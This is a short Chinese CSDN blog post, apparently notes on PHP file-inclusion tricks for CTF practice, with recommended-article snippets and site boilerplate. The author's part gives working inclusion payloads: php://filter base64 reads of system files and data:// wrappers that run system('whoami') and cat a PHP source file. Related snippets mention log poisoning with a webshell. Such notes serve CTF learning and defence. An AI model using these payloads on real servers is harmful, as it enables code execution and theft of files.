PHP 文件包含 -ctf

最新推荐文章于 2024-07-13 15:12:45 发布
最新推荐文章于 2024-07-13 15:12:45 发布
阅读量673 收藏 1
点赞数 1
分类专栏: 学海无涯
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38656841/article/details/119522131
版权 
php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini”

http://192.168.43.173:8999/lsawebtest/phptest/phprotocol1.php?

file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==

也可以用来读php文件源码:

data:text/plain,<?php system(‘cat /var/www/phprotocol1.php’)?>

或者命令执行:

data:text/plain,<?php system(‘whoami’)?>

file协议

php://filter协议

 

php://input 伪协议

 

 data://伪协议

 http伪协议:

 ftp伪协议

 

 phar 协议

 

ZIP协议介绍

 

 

 

 

 

时光凉春衫薄
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
php文件包含读源码,CTF PHP文件包含--session
weixin_30045711的博客
03-12 703
PHP文件包含 Session首先了解一下PHP文件包含漏洞----包含session利用条件:session文件路径已知,且其中内容部分可控。姿势:php的session文件的保存路径可以在phpinfo的session.save_path看到。常见的php-session存放位置:/var/lib/php/sess_PHPSESSID/var/lib/php/sess_PHPSESSID/tm...
CTF---Web---文件包含---02---rot13伪协议
qq_22160557的博客
07-28 1647
文章目录前言一、题目描述二、解题步骤1、页面跳转2、文件包含(参数为page)3、rot13伪协议包含4、rot13伪协议读取5、rot13编码解码6、代码审计7、构造payload8、得到flag总结 前言 题目分类: CTF—Web—文件包含—02—rot13伪协议 一、题目描述 题目:13、另辟蹊径 (题号为13) 二、解题步骤 1、页面跳转 Step1:点击运维设备,会跳转到http://192.168.87.183/index.php界面。 2、文件包含(参数为page) Step2:点击
php文件包含-CTFshow-web79
读万卷书,行万里路。
07-26 484
0 前言 在上一篇文章,我们尝试 5 种协议来实现文件包含。但在 web79 中,代码使用 str_replace 函数将字符串中的 php 替换成 ??? ,所以我们要尽可能的避免使用关键字 php。 1 file:// 或 不使用协议 方法同 php文件包含-CTFshow-web78 。 2 http:// 在上一篇文章中,使用的链接为 https://blog-1256032382.cos.ap-nanjing.myqcloud.com/eval.php,在链接的尾部含有 php 关键字,无法直接
CTF文件包含篇 与 php文件包含
最新发布
2301_81556781的博客
07-13 693
phpMyAdmin是开源的MYSQL数据库管理工具 4.8.0~4.8.1index.php界面存在文件包含功能,代码分析进行绕过可实现漏洞利用。
CTF入门之php文件包含
qq_37410729的博客
07-23 2336
ctf-show web3,web4
文件包含(CTF)
热门推荐
ing_end的博客
04-02 1万+
文件包含 留言 连接数据库 查看留言 连接数据库 登录 连接数据库 注册 连接数据库 代码的重复 留言 查看留言 连接数据库单独的文件 登录 注册 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某个函数的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含。 程序开发人员都希望代码更加灵活,所以通常会把被包含的文件设置为变量,来进行动态调用,但正是由于这种灵活性,从而导致客户端可以
php文件包含-CTFshow-web78
读万卷书,行万里路。
07-25 350
1 file:// 或 不使用协议 (将文件直接读入,无法进行编码,会被 php 执行) 包含一句话木马,实现代码执行来读取 flag。 访问URLhttp://21da7ba4-6818-45bc-903a-7eb4c78a3284.challenge.ctf.show:8080/?file=file:///var/log/nginx/access.log,来确定是否能读取 nginx 的日志。 确定可以访问 nginx 的日志后。使用Burp进行抓包,并修改 User-Agent 为 <?
Hackzone-tunisia-CTF:网站 CTF php + mysql + bootstrap
06-02
2. 文件包含漏洞:检查是否存在可能导致恶意代码执行的不受限制的文件包含函数。 3. 变量和作用域:理解如何正确地声明和使用变量,避免潜在的安全问题。 4. 错误报告和日志:学会如何配置错误报告级别以减少敏感...
006-CTF web题型总结-第六课 CTF WEB实战练习(二) .pdf
07-09
可能与文件包含漏洞有关,参赛者需要了解如何利用文件路径控制或者远程文件包含来读取服务器上的特定文件,通常包括flag信息。 3. **bugku-ctf 第三题:速度要快** 这个题目可能测试的是XSS(跨站脚本攻击)或...
CTF---Web---文件包含---01
qq_22160557的博客
07-28 965
文章目录前言一、题目描述二、解题步骤1.查看源代码2.文件包含(/etc/passwd)3.解码总结 前言 题目分类: CTF—Web—文件包含 一、题目描述 题目:提示寻找passwd文件 二、解题步骤 1.查看源代码 提示所有图片存储路径是download.php?name=img, 此时name参数的存在就提示此题可能为“文件包含”。 2.文件包含(/etc/passwd) 两种查看方式: 2.1、访问view-source:http://192.168.87.180/download.php
攻防世界CTF —— PHP本地文件包含漏洞解题思路
weixin_47610939的博客
07-27 4142
攻防世界的CTF web类题目,关于php本地文件包含漏洞的解题思路
ctfshow-文件包含
m0_74456293的博客
03-27 563
ctfshow-文件包含
实战经验丨CTF文件包含的技巧总结
dfdhxb995397的博客
04-10 770
站在巨人的肩头才会看见更远的世界,这是一篇技术牛人对CTF比赛中文件包含的内容总结,主要是对一些包含点的原理和特征进行归纳分析,并结合实际的例子来讲解如何绕过,全面细致,通俗易懂,掌握这个新技能定会让你在CTF路上少走很多弯路,不看真的会后悔! php伪协议的分类 伪协议是文件包含的基础,理解伪协议的原理才能更好的利用文件包含漏洞。 php://input php:...
南邮杯CTF 文件包含漏洞实战
永远是少年
12-14 906
今天继续给大家介绍CTF刷题,本文主要内容是南邮杯CTF 文件包含漏洞实战。 一、题目简介 二、解题思路 三、解题实战
攻防世界(题目名称-文件包含
……
09-14 1241
php协议过滤器绕过
CG-CTF-Web-文件包含
1stPeak's Blog
06-22 2648
文件包含 1.查看题目 2.进去查看题目,看到下面第一幅图中的内容,我们点击这个超链接 3.点击上图的超链接后,出现下图所示 4.根据URL与题目名,可以知道这里应该是利用文件包含 (1)首先尝试…/,发现出现下图所示: 源代码也没有什么可以利用的: (2)其实这里利用的是php伪协议,下图是index.php经过base64加密的源码 http://4.chinalover.sinaa...
文件包含漏洞 基础
weixin_50464560的博客
03-21 946
CTF文件包含漏洞总结 0x01 什么是文件包含漏洞 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。 0x02 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据allow_...
php 文件包含讲解,PHP文件包含小结
weixin_33980357的博客
03-22 147
协议各种协议的使用有时是关键file协议file后面需是///,例如file:///d:/1.txt也可以是file://e:/1.txt,如果是在当前盘则可以file:///1.txt如果是php文件,则文件内容通过查看源码的方式读取文件名可以通过>替代zip://协议例:zip://e:1.zip#1.txt(#需转为%23)路径必须为绝对路径phar://协议例:phar://1.ph...
攻防_漏洞_文件包含_文件包含漏洞详解
redglare的博客
10-22 4095
文件包含漏洞详解
文件包含-伪协议filter
08-22
伪协议filter是一种用于文件包含的伪协议。它不受allow_url_fopen和allow_url_include参数的影响,可以用来读取本地文件系统或访问HTTP、FTP等协议的URL。 在PHP中,可以使用php://filter伪协议来读取文件内容并对其进行处理。例如,使用php://filter/resource=来读取文件内容,php://filter/read=convert.base64-encode/resource=可以将文件内容以base64编码输出。 通过使用filter伪协议,攻击者可以利用文件包含漏洞来读取敏感文件,包括PHP源代码、配置文件等。因此,在编写PHP代码时,务必要注意对用户输入进行严格过滤和验证,避免文件包含漏洞的利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [文件包含-伪协议](https://blog.csdn.net/Wu000999/article/details/101925271)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [CTF---Web---文件包含---02---rot13伪协议](https://blog.csdn.net/qq_22160557/article/details/119174803)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

时光凉春衫薄

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值